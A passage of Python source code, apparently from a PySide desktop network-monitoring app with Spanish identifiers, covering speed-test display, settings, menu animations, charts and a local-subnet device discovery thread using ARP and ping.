BajadaPor=float(self.velocidad[0])*100/bajada\r\n Porcentaje=(SubidaPor+BajadaPor)/2\r\n Ping=float(self.velocidad[4])\r\n if self.inf.TEMA==\"Obscuro\":\r\n BIEN=\"QFrame{background-color:#282a36; border:10px solid; border-color:#02AC66;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n MEDIO=\"QFrame{background-color:#282a36; border:10px solid; border-color:#024A86;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n MAL=\"QFrame{background-color:#282a36; border:10px solid; border-color:#C82A54;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n else:\r\n BIEN=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#02AC66;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n MEDIO=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#024A86;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n MAL=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#C82A54;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n if SubidaPor>=80: self.ui.Subida_C.setStyleSheet(BIEN)\r\n elif SubidaPor<80 and SubidaPor>=50: self.ui.Subida_C.setStyleSheet(MEDIO)\r\n elif SubidaPor<50: self.ui.Subida_C.setStyleSheet(MAL)\r\n \r\n if BajadaPor>=80: self.ui.Velocidad_C.setStyleSheet(BIEN)\r\n elif BajadaPor<80 and BajadaPor>=50: self.ui.Velocidad_C.setStyleSheet(MEDIO)\r\n elif BajadaPor<50: self.ui.Velocidad_C.setStyleSheet(MAL)\r\n \r\n if Ping<=50: self.ui.Ping_C.setStyleSheet(BIEN)\r\n elif Ping<=100 and BajadaPor>50: self.ui.Ping_C.setStyleSheet(MEDIO)\r\n elif Ping>100: self.ui.Ping_C.setStyleSheet(MAL)\r\n\r\n Estado=\"\"\r\n if Porcentaje>=95:Estado=\"Excelente\"\r\n elif Porcentaje>=70 and Porcentaje<95:Estado=\"Bueno\"\r\n elif Porcentaje>=40 and 
Porcentaje<70:Estado=\"Regular\"\r\n elif Porcentaje<40:Estado=\"Malo\"\r\n self.ui.SpeedBajada.setText(self.velocidad[2]+\" ms\")\r\n self.ui.SpeedSubida.setText(self.velocidad[3]+\" ms\")\r\n self.ui.SpeedServidor.setText(self.velocidad[5])\r\n self.ui.SpeedSponsor.setText(self.velocidad[6].replace(\"ISP:\",\"\"))\r\n db.insertarPRUEBAS_VELOCIDAD(red,f\"{now.year}-{now.month}-{now.day}\",f\"{now.hour}:{now.minute}\",self.velocidad[5],self.velocidad[6].replace(\"ISP:\",\"\"),float(self.velocidad[1]),float(self.velocidad[0]),float(self.velocidad[2]),self.velocidad[3],float(self.velocidad[4]),Estado)\r\n self.DBPruebas()\r\n if self.inf.TEMA==\"Obscuro\": \r\n self.ui.PruebaVelBtn.setStyleSheet(\"border-radius:10px;background-color: #1f232a;\tpadding: 8px 8px;\")\r\n else:\r\n self.ui.PruebaVelBtn.setStyleSheet(\"border-radius:10px;background-color: #FFFFFF;\tpadding: 8px 8px;\")\r\n self.ui.PruebaVelBtn.setText(\"Iniciar\")\r\n self.ui.PruebaVelBtn.setEnabled(True)\r\n self.ui.PruebaVelTBtn.setEnabled(True)\r\n ##############################################\r\n ## Encabezado\r\n ##############################################\r\n def AplicarConf(self):\r\n aux1=self.ui.Ajus1.itemText(self.ui.Ajus1.currentIndex())\r\n aux2=self.ui.Ajus2.itemText(self.ui.Ajus2.currentIndex())\r\n aux3=self.ui.Ajus3.itemText(self.ui.Ajus3.currentIndex())\r\n aux4=self.ui.Ajus4.text()\r\n aux5=self.ui.Ajus5.text()\r\n file=open(\"modulos/BasesDatos/configuracion.conf\",\"w\",encoding=\"utf-8\")\r\n file.write(f\"{aux1}\\n\")\r\n file.write(f\"{aux2}\\n\")\r\n file.write(f\"{aux3}\\n\")\r\n file.write(f\"{aux4}\\n\")\r\n file.write(f\"{aux5}\")\r\n file.close()\r\n self.inf.SALIR=True\r\n self.TrafObj.Cerrar=True\r\n self.close()\r\n os.execl(sys.executable, \"main.py\", *sys.argv) \r\n\r\n\r\n def mouseDoubleClickEvent(self, event):\r\n widget = self.childAt(event.pos())\r\n if widget is not None and widget.objectName() == \"Encabezado\":\r\n self.Maximizar_Restaurar()\r\n def validarNumero(self,text):\r\n aux=text.text()\r\n try:\r\n float(aux)\r\n except:\r\n text.setText(aux[0:len(aux)-1])\r\n def Cerrar(self):\r\n self.inf.SALIR=True\r\n self.TrafObj.Cerrar=True\r\n self.close()\r\n sys.exit(sys.executable)\r\n def closeEvent(self, event):\r\n self.inf.SALIR=True\r\n self.TrafObj.Cerrar=True\r\n event.accept()\r\n def Minimizar(self):\r\n self.showMinimized()\r\n def Maximizar_Restaurar(self):\r\n status=self.GLOBAL_STATE\r\n if status == False:\r\n self.showMaximized()\r\n self.GLOBAL_STATE = True\r\n self.ui.MaxBtn.setToolTip(\"Restaurar\")\r\n self.ui.MaxBtn.setIcon(QIcon(u\":/Iconos2/Imagenes/icons/icon_maximize.png\"))\r\n else:\r\n self.GLOBAL_STATE = False\r\n self.showNormal()\r\n self.resize(1089, 640)\r\n self.ui.MaxBtn.setToolTip(\"Maximizar\")\r\n self.ui.MaxBtn.setIcon(QIcon(u\":/Iconos2/Imagenes/icons/cil-window-maximize.png\"))\r\n self.ui.SalidaGestion.resizeRowsToContents()\r\n for i in range(0,self.ui.SalidaGestion.columnCount()): self.ui.SalidaGestion.setColumnWidth(i,self.ui.SalidaGestion.width()/self.ui.SalidaGestion.columnCount())\r\n self.ui.TablaVelocidad.resizeRowsToContents()\r\n for i in range(0,self.ui.TablaVelocidad.columnCount()): self.ui.TablaVelocidad.setColumnWidth(i,self.ui.TablaVelocidad.width()/self.ui.TablaVelocidad.columnCount())\r\n self.ui.TablaPaquetes.resizeRowsToContents()\r\n for i in range(0,self.ui.TablaPaquetes.columnCount()): self.ui.TablaPaquetes.setColumnWidth(i,self.ui.TablaPaquetes.width()/self.ui.TablaPaquetes.columnCount())\r\n 
self.ui.PINGOUT.resizeRowsToContents()\r\n for i in range(0,self.ui.PINGOUT.columnCount()): self.ui.PINGOUT.setColumnWidth(i,self.ui.PINGOUT.width()/self.ui.PINGOUT.columnCount())\r\n pressing = False\r\n def mousePressEvent(self, event):\r\n widget = self.childAt(event.pos())\r\n if widget is not None and widget.objectName() == \"Encabezado\":\r\n self.dragPosition = event.globalPos() - self.frameGeometry().topLeft()\r\n event.accept()\r\n self.pressing = True\r\n def mouseMoveEvent(self, event):\r\n if self.pressing:\r\n if self.GLOBAL_STATE==True:\r\n self.Maximizar_Restaurar()\r\n self.GLOBAL_STATE==False\r\n self.move( self.dragPosition)\r\n self.move(event.globalPos() - self.dragPosition)\r\n event.accept()\r\n def mouseReleaseEvent(self, QMouseEvent):\r\n self.pressing = False\r\n Side_menu_I=0\r\n def animacion_lateral_Inicio(self,p1,p2,t,elemento):\r\n self.animacion = QPropertyAnimation(elemento,b\"maximumWidth\")\r\n self.animacion.setDuration(t)\r\n self.animacion.setStartValue(p1)\r\n self.animacion.setEndValue(p2)\r\n self.animacion.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion.start()\r\n \r\n self.animacion2 = QPropertyAnimation(elemento,b\"minimumWidth\")\r\n self.animacion2.setDuration(t)\r\n self.animacion2.setStartValue(p1)\r\n self.animacion2.setEndValue(p2)\r\n self.animacion2.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion2.start()\r\n \r\n def animacion_lateral_Fin(self,p1,p2,t,elemento):\r\n self.animacion = QPropertyAnimation(elemento,b\"minimumWidth\")\r\n self.animacion.setDuration(t)\r\n self.animacion.setStartValue(p2)\r\n self.animacion.setEndValue(p1)\r\n self.animacion.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion.start()\r\n \r\n self.animacion2 = QPropertyAnimation(elemento,b\"maximumWidth\")\r\n self.animacion2.setDuration(t)\r\n self.animacion2.setStartValue(p2)\r\n self.animacion2.setEndValue(p1)\r\n self.animacion2.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion2.start()\r\n def animacion_Vertical_Inicio(self,p1,p2,t,elemento):\r\n self.animacion = QPropertyAnimation(elemento,b\"maximumHeight\")\r\n self.animacion.setDuration(t)\r\n self.animacion.setStartValue(p1)\r\n self.animacion.setEndValue(p2)\r\n self.animacion.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion.start()\r\n \r\n self.animacion2 = QPropertyAnimation(elemento,b\"minimumHeight\")\r\n self.animacion2.setDuration(t)\r\n self.animacion2.setStartValue(p1)\r\n self.animacion2.setEndValue(p2)\r\n self.animacion2.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion2.start()\r\n \r\n def animacion_Vertical_Fin(self,p1,p2,t,elemento):\r\n self.animacion = QPropertyAnimation(elemento,b\"minimumHeight\")\r\n self.animacion.setDuration(t)\r\n self.animacion.setStartValue(p2)\r\n self.animacion.setEndValue(p1)\r\n self.animacion.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion.start()\r\n \r\n self.animacion2 = QPropertyAnimation(elemento,b\"maximumHeight\")\r\n self.animacion2.setDuration(t)\r\n self.animacion2.setStartValue(p2)\r\n self.animacion2.setEndValue(p1)\r\n self.animacion2.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion2.start()\r\n def Menu_Izquierdo(self):\r\n if self.Side_menu_I==0:\r\n self.animacion_lateral_Inicio(45,145,500,self.ui.MenuIzquierdo)\r\n self.Side_menu_I=1\r\n else:\r\n self.animacion_lateral_Fin(45,145,500,self.ui.MenuIzquierdo)\r\n self.Side_menu_I=0\r\n def cerrar_MenuC(self):\r\n if self.inf.TEMA==\"Obscuro\":\r\n style=\"QPushButton{text-align:left;\tpadding:5px 
10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n else:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#FFFFFF;}QPushButton::pressed{background-color:#FFFFFF;}\"\r\n self.ui.AjustesBtn.setStyleSheet(style)\r\n self.ui.AyudaBtn.setStyleSheet(style)\r\n self.animacion_lateral_Fin(0,230,500,self.ui.MenuCentral)\r\n self.Side_menu_A=0\r\n Side_menu_H=0 \r\n def Ayuda(self):\r\n if self.Side_menu_H==0 and self.Side_menu_A == 0:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AjustesBtn.setStyleSheet(style)\r\n style=\"QPushButton{background-color:#1f232a; text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AyudaBtn.setStyleSheet(style)\r\n self.ui.ContenidoCentral.setCurrentWidget(self.ui.pAyu) \r\n self.animacion_lateral_Inicio(0,300,500,self.ui.MenuCentral)\r\n self.ui.label.setText(\"Ayuda\")\r\n self.Side_menu_H=1\r\n os.system(\"START modulos/BasesDatos/Manual.pdf\")\r\n\r\n elif self.Side_menu_A == 1 and self.Side_menu_H == 0:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AjustesBtn.setStyleSheet(style)\r\n style=\"QPushButton{background-color:#1f232a; text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AyudaBtn.setStyleSheet(style)\r\n self.ui.ContenidoCentral.setCurrentWidget(self.ui.pAyu) \r\n self.Side_menu_A=0\r\n self.Side_menu_H=1\r\n self.ui.label.setText(\"Ayuda\")\r\n os.system(\"START modulos/BasesDatos/Manual.pdf\")\r\n\r\n else:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AyudaBtn.setStyleSheet(style)\r\n self.animacion_lateral_Fin(0,300,500,self.ui.MenuCentral)\r\n self.Side_menu_H=0\r\n Side_menu_A=0 \r\n def menuAjus(self):\r\n aux=open(\"modulos/BasesDatos/configuracion.conf\",\"r\",encoding=\"utf-8\")\r\n contenido=aux.readlines()\r\n self.inf.VENTANA=contenido[0].replace(\"\\n\",\"\")\r\n self.inf.TEMA=contenido[1].replace(\"\\n\",\"\")\r\n self.inf.DETECCION=contenido[2].replace(\"\\n\",\"\")\r\n self.inf.TIEMPO_DETECCION=float(contenido[3].replace(\"\\n\",\"\"))\r\n self.inf.TIEMPO_PAQ=float(contenido[4].replace(\"\\n\",\"\"))\r\n aux.close()\r\n self.ui.Ajus1.clear()\r\n if self.inf.VENTANA==\"Propia del Software\":\r\n self.ui.Ajus1.addItem(\"Propia del Software\")\r\n self.ui.Ajus1.addItem(\"Propia del SO\")\r\n else:\r\n self.ui.Ajus1.addItem(\"Propia del SO\")\r\n self.ui.Ajus1.addItem(\"Propia del Software\")\r\n self.ui.Ajus2.clear()\r\n if self.inf.TEMA==\"Obscuro\":\r\n self.ui.Ajus2.addItem(\"Obscuro\")\r\n self.ui.Ajus2.addItem(\"Claro\")\r\n else:\r\n 
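# Whichever value is currently saved is added first, so the combo box shows the active setting as its default selection.\r\n            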
self.ui.Ajus2.addItem(\"Claro\")\r\n self.ui.Ajus2.addItem(\"Obscuro\")\r\n self.ui.Ajus3.clear()\r\n if self.inf.DETECCION==\"Preciso (ARP y Ping)\":\r\n self.ui.Ajus3.addItem(\"Preciso (ARP y Ping)\")\r\n self.ui.Ajus3.addItem(\"Rápido (Solo ARP)\")\r\n else:\r\n self.ui.Ajus3.addItem(\"Rápido (Solo ARP)\")\r\n self.ui.Ajus3.addItem(\"Preciso (ARP y Ping)\")\r\n self.ui.Ajus4.setText(str(self.inf.TIEMPO_DETECCION))\r\n self.ui.Ajus5.setText(str(self.inf.TIEMPO_PAQ))\r\n def Ajustes(self):\r\n if self.Side_menu_A==0 and self.Side_menu_H == 0:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AyudaBtn.setStyleSheet(style)\r\n\r\n style=\"QPushButton{background-color:#1f232a; text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AjustesBtn.setStyleSheet(style)\r\n self.ui.ContenidoCentral.setCurrentWidget(self.ui.pAjus) \r\n self.animacion_lateral_Inicio(0,300,500,self.ui.MenuCentral)\r\n \r\n self.Side_menu_A=1\r\n self.ui.BarDis.clear()\r\n self.menuAjus()\r\n self.ui.label.setText(\"Ajustes\")\r\n elif self.Side_menu_H == 1 and self.Side_menu_A == 0:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AyudaBtn.setStyleSheet(style)\r\n style=\"QPushButton{background-color:#1f232a; text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AjustesBtn.setStyleSheet(style)\r\n self.ui.ContenidoCentral.setCurrentWidget(self.ui.pAjus)\r\n self.Side_menu_H=0\r\n self.Side_menu_A=1\r\n self.ui.label.setText(\"Ajustes\")\r\n self.menuAjus()\r\n\r\n else:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AjustesBtn.setStyleSheet(style)\r\n self.ui.AyudaBtn.setStyleSheet(style)\r\n self.animacion_lateral_Fin(0,300,500,self.ui.MenuCentral)\r\n self.Side_menu_A=0\r\n \r\n Side_menu_D=0 \r\n def Usuarios(self):\r\n if self.Side_menu_D==0 and self.Side_menu_US == 0:\r\n self.ui.label_2.setText(\"Usuarios Dentro de la Red\")\r\n self.ui.ContenidoDerecho.setCurrentWidget(self.ui.pUse) \r\n self.animacion_lateral_Inicio(0,320,500,self.ui.MenuDerecho)\r\n\r\n self.Side_menu_D=1\r\n \r\n\r\n elif self.Side_menu_US == 1 and self.Side_menu_D == 0:\r\n self.ui.ContenidoDerecho.setCurrentWidget(self.ui.pUse)\r\n self.Side_menu_D=1\r\n self.Side_menu_US=0\r\n \r\n else:\r\n self.animacion_lateral_Fin(0,320,500,self.ui.MenuDerecho)\r\n self.Side_menu_D=0\r\n def hilo_usuarios(self):\r\n while self.inf.SALIR!=True:\r\n if self.inf.CONEXION==True:\r\n try:\r\n if self.inf.CAMBIOS == False:\r\n self.NUM,dispositivos,ips_arp=rs.escanearARP(self.inf.GATEWAY+\"/24\",self.inf.INTERFAZ)\r\n aux=self.inf.GATEWAY.split(\".\")\r\n GATEWAY_PING=aux[0]+\".\"+aux[1]+\".\"+aux[2]+\".0/24\"\r\n if self.inf.SALIR==True: break\r\n if self.inf.DETECCION==\"Preciso (ARP y Ping)\":\r\n if 
self.inf.CAMBIOS == False:\r\n ips_ping=rs.pingda(GATEWAY_PING,ips_arp,self.inf)\r\n if self.inf.SALIR==True: break\r\n if self.inf.CAMBIOS == False:\r\n disposi=rs.ping_arp(ips_ping, ips_arp,dispositivos,self.inf.INTERFAZ)\r\n if self.inf.SALIR==True: break\r\n else:\r\n disposi=dispositivos\r\n if self.inf.CAMBIOS == False:\r\n self.NUM,self.dispo=rs.obtener_datos_Dispositivo(disposi,self.inf.INTERFAZ,self.inf)\r\n if self.inf.SALIR==True: break\r\n if self.inf.CAMBIOS == False:\r\n self.signalUser.emit(1)\r\n self.inf.CAMBIOS=False\r\n self.mostrarErrores()\r\n sleep(self.inf.TIEMPO_DETECCION)\r\n except Exception as e:\r\n print(f\"[!] Error:{e}\")\r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Error de Aplicación\",\"Se detecto el error\"+str(type(e))])\r\n sleep(10)\r\n else:\r\n sleep(1)\r\n def UsuariosDisp(self):\r\n disp = QVBoxLayout()\r\n disp.addWidget(QLabel(\"

Existen \"+str(self.NUM)+\" dispositivos conectados.

\"))\r\n for NE in self.dispo:\r\n aux=UsuariosClass(NE,self.inf.TEMA,self.inf)\r\n disp.addWidget(aux) \r\n aux2=QWidget()\r\n aux2.setLayout(disp)\r\n aux2.setContentsMargins(0,0,0,0)\r\n self.ui.scrollArea_2.setWidget(aux2)\r\n try:\r\n ID=int(db.consultar(f\"SELECT ID_RED FROM RED WHERE SSID='{self.inf.SSID}'\")[0][0])\r\n val=db.consultar(f\"SELECT count(*) FROM CONTROL_RED_ESPECIFICA WHERE ID_RED={ID}\")[0][0]\r\n self.ui.UserBtn.setText(f\" {self.NUM} / {str(int(val))}\")\r\n except:\r\n print(\"[!] Error al actualizar usuarios.\")\r\n self.ui.UserBtn.setText(\"\")\r\n Side_menu_US=0\r\n def Dipositivos(self):\r\n if self.Side_menu_US==0 and self.Side_menu_D == 0:\r\n #self.ui.SalidaARP.setHtml(\"asasd\")\r\n self.ui.label_2.setText(\"Interfaces de red\")\r\n self.ui.ContenidoDerecho.setCurrentWidget(self.ui.pDisp) \r\n self.animacion_lateral_Inicio(0,320,500,self.ui.MenuDerecho)\r\n self.DispositivosFrame()\r\n self.Side_menu_US=1\r\n elif self.Side_menu_D == 1 and self.Side_menu_US == 0:\r\n self.ui.ContenidoDerecho.setCurrentWidget(self.ui.pDisp)\r\n self.DispositivosFrame()\r\n self.Side_menu_D=0\r\n self.Side_menu_US=1\r\n else:\r\n self.animacion_lateral_Fin(0,320,500,self.ui.MenuDerecho)\r\n self.Side_menu_US=0\r\n def DispositivosFrame(self):\r\n disp = QVBoxLayout()\r\n INTER=rs.Obtener_Dispositivos(True)\r\n for IN in INTER:\r\n aux=DispositivosClass(IN,self.inf.TEMA,self.inf)\r\n disp.addWidget(aux) \r\n aux=QWidget()\r\n aux.setLayout(disp)\r\n aux.setContentsMargins(0,0,0,0)\r\n self.ui.scrollArea.setWidget(aux)\r\n def cerrar_MenuD(self):\r\n self.animacion_lateral_Fin(0,320,500,self.ui.MenuDerecho)\r\n self.Side_menu_US=0\r\n Side_menu_AL=0 \r\n def Alerta(self):\r\n self.formato(self.ui.AlertasBtn)\r\n if self.Side_menu_AL==0:\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.Notificacion)\r\n self.Side_menu_AL=1\r\n else:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AlertasBtn.setStyleSheet(style)\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.Notificacion)\r\n self.Side_menu_AL=0\r\n self.errores()\r\n def cerrar_MenuN(self):\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AlertasBtn.setStyleSheet(style)\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.Notificacion)\r\n self.Side_menu_AL=0\r\n def Velocidad(self):\r\n self.BorrarFormatos()\r\n self.formato(self.ui.VelocidadBtn)\r\n self.ui.Contenidos.setCurrentWidget(self.ui.pVel) \r\n self.DBPruebas()\r\n self.ui.TablaVelocidad.resizeRowsToContents()\r\n for i in range(0,self.ui.TablaVelocidad.columnCount()): self.ui.TablaVelocidad.setColumnWidth(i,self.ui.TablaVelocidad.width()/self.ui.TablaVelocidad.columnCount())\r\n def DashBoard(self):\r\n self.BorrarFormatos()\r\n self.formato(self.ui.DashboardBtn)\r\n self.ui.Contenidos.setCurrentWidget(self.ui.pTab)\r\n self.actualizarDatosDash() \r\n self.crearTablas()\r\n senalS=Signal(int)\r\n def senal(self):\r\n while self.inf.SALIR!=True:\r\n self.senalS.emit(1)\r\n sleep(5)\r\n def PromedioVel(self):\r\n pr=db.consultarPRUEBAS_VELOCIDAD()\r\n datos=[]\r\n fechav=\"\"\r\n cont=0\r\n for i in pr:\r\n if self.inf.SSID==i[5]:\r\n if fechav!=i[1]:\r\n datos.append([i[1],i[6],i[7]])\r\n cont+=1\r\n 
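# When a date repeats, the new sample is folded into the stored row as a pairwise average, so recent samples weigh more than an exact per-day mean: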
else:\r\n datos[cont-1][1]=(datos[cont-1][1]+i[6])/2\r\n datos[cont-1][2]=(datos[cont-1][2]+i[7])/2\r\n fechav=i[1]\r\n return datos\r\n def crearTablas(self):\r\n self.crearGraficaVel()\r\n self.crearGraficaUser()\r\n self.pendientes()\r\n disp = QVBoxLayout()\r\n disp.addWidget(QLabel(f\"

Buscando Dispositivos en {self.inf.SSID}...

\")) \r\n aux2=QWidget()\r\n aux2.setLayout(disp)\r\n aux2.setContentsMargins(0,0,0,0)\r\n self.ui.scrollArea_2.setWidget(aux2)\r\n def pendientes(self):\r\n disp = QVBoxLayout()\r\n disp.addWidget(QLabel(\"

Pendientes

\"))\r\n pr=db.consultarPROBLEMAS_RED()\r\n enc=False\r\n for NE in pr:\r\n if NE[4]!=\"Corregido\":\r\n aux=pendientesClass(NE,self.inf.TEMA,self.inf)\r\n disp.addWidget(aux)\r\n enc=True\r\n if enc==False:\r\n aux=QFrame(self)\r\n Layout = QGridLayout()\r\n label = QLabel(self)\r\n pixmap = QPixmap('Imagenes/CORRECTO.png').scaled(50,50)\r\n label.setPixmap(pixmap)\r\n Aux2=QWidget()\r\n Aux = QHBoxLayout()\r\n Aux2.setLayout(Aux)\r\n Layout.addWidget(label,0,0)\r\n Layout.addWidget(QLabel(\"\"),0,1)\r\n Layout.addWidget(QLabel(\"Excelente, sin pendientes\"),0,2)\r\n Layout.addWidget(QLabel(\"\"),0,3)\r\n if self.inf.TEMA==\"Obscuro\":\r\n aux.setStyleSheet(\"QLabel{border-color:black;} QFrame{Background-color:#1f232a; Border-Radius:10px; }\")\r\n else:\r\n aux.setStyleSheet(\"QLabel{border-color:gray;} QFrame{Background-color:#D8D8D8; Border-Radius:10px; }\")\r\n aux.setLayout(Layout)\r\n disp.addWidget(aux)\r\n aux2=QWidget()\r\n aux2.setLayout(disp)\r\n aux2.setContentsMargins(0,0,0,0)\r\n self.ui.WidgetPend.setWidget(aux2)\r\n def crearGraficaUser(self):\r\n if self.inf.TEMA==\"Obscuro\":\r\n enc=[\"\",\"\"]\r\n else:\r\n enc=[\"\",\"\"]\r\n series = QBarSeries()\r\n d=db.consultar(\"SELECT R.ID_RED, R.SSID,C.MAC_HOST FROM CONTROL_RED_ESPECIFICA AS C INNER JOIN RED AS R ON R.ID_RED=C.ID_RED ORDER BY R.ID_RED\")\r\n datos=[]\r\n redv=\"\"\r\n cont=0\r\n for i in d:\r\n if redv!=i[1]:\r\n datos.append([i[1],1])\r\n cont+=1 \r\n else:\r\n datos[cont-1][1]=datos[cont-1][1]+1 \r\n redv=i[1]\r\n for i in datos:\r\n set = QBarSet(i[0])\r\n set.append(i[1])\r\n series.append(set)\r\n series.setLabelsVisible(False)\r\n cat=QBarCategoryAxis()\r\n cat.append([\"Usuarios\"])\r\n chart =QChart()\r\n if self.inf.TEMA==\"Obscuro\":\r\n chart.setBackgroundVisible(False)\r\n else:\r\n chart.setBackgroundVisible(True)\r\n chart.addSeries(series)\r\n chart.createDefaultAxes()\r\n chart.setAxisX(cat,series)\r\n chart.setAnimationOptions(QChart.SeriesAnimations)\r\n chart.setTitle(enc[0]+\"Numero de usuarios en redes\"+enc[1])\r\n chart.legend().setVisible(True)\r\n chart.legend().setAlignment(Qt.AlignBottom)\r\n chartV = QChartView(chart)\r\n chartV.setRenderHint(QPainter.Antialiasing)\r\n aux=QWidget()\r\n layout=QHBoxLayout()\r\n layout.addWidget(chartV)\r\n aux.setLayout(layout)\r\n self.ui.WidgetUser.setWidget(aux)\r\n def crearGraficaVel(self):\r\n if self.inf.TEMA==\"Obscuro\":\r\n enc=[\"\",\"\"]\r\n else:\r\n enc=[\"\",\"\"]\r\n series = QLineSeries()\r\n series2 = QLineSeries()\r\n series3= QLineSeries()\r\n series4 = QLineSeries()\r\n series5 = QLineSeries()\r\n aux=self.PromedioVel()\r\n r=db.consultar(f\"SELECT ID_RED,SUBIDA,BAJADA FROM RED WHERE SSID='{self.inf.SSID}'\")\r\n try:\r\n subida=r[0][1] \r\n bajada=r[0][2]\r\n except:\r\n subida=0 \r\n bajada=0\r\n series.setName(enc[0]+\"Subida\"+enc[1])\r\n series2.setName(enc[0]+\"Bajada\"+enc[1])\r\n series4.setName(enc[0]+f\"{subida}\"+enc[1])\r\n series4.setColor(\"red\")\r\n series5.setName(enc[0]+f\"{bajada}\"+enc[1])\r\n series5.setColor(\"red\")\r\n series3.hide()\r\n if self.inf.CONEXION==True:\r\n dias=0\r\n if len(aux)<7:\r\n for i in aux:\r\n dias+=1\r\n series3.append(dias,0)\r\n series3.append(dias,subida+10)\r\n series3.append(dias,bajada+10)\r\n series.append(dias,i[1])\r\n series2.append(dias,i[2])\r\n series4.append(dias,subida)\r\n series5.append(dias,bajada)\r\n else:\r\n dias2=0\r\n for i in aux:\r\n if dias>len(aux)-7:\r\n dias2+=1\r\n series3.append(dias,0)\r\n series3.append(dias,subida+10)\r\n 
series3.append(dias,bajada+10)\r\n series.append(dias2,i[1])\r\n series2.append(dias2,i[2])\r\n series4.append(dias2,subida)\r\n series5.append(dias2,bajada)\r\n dias+=1\r\n else:\r\n series.append(0,0)\r\n series2.append(0,0)\r\n series3.append(0,0)\r\n series4.append(0,0)\r\n series5.append(0,0)\r\n chart =QChart()\r\n if self.inf.TEMA==\"Obscuro\":\r\n chart.setBackgroundVisible(False)\r\n else:\r\n chart.setBackgroundVisible(True)\r\n chart.addSeries(series)\r\n chart.addSeries(series2)\r\n chart.addSeries(series3)\r\n chart.addSeries(series4)\r\n chart.addSeries(series5)\r\n chart.createDefaultAxes()\r\n chart.setAnimationOptions(QChart.SeriesAnimations)\r\n chart.setTitle(enc[0]+\"Registro de velocidad de los ultimos 7 Días\"+enc[1])\r\n chart.legend().setVisible(True)\r\n chart.legend().setAlignment(Qt.AlignBottom)\r\n\r\n chartV = QChartView(chart)\r\n chartV.setRenderHint(QPainter.Antialiasing)\r\n aux=QWidget()\r\n layout=QHBoxLayout()\r\n layout.addWidget(chartV)\r\n aux.setLayout(layout)\r\n self.ui.WidgetVeloci.setWidget(aux)\r\n def crearGraficaSignal(self):\r\n try:\r\n try: senal=float(rs.obtenerIntencidad(self.inf.INTERFAZ).replace(\"%\",\"\"))\r\n except:senal=0\r\n pie=QPieSeries()\r\n if self.inf.CONEXION==True:\r\n if \"ETHERNET\" in self.inf.INTERFAZ.upper() and 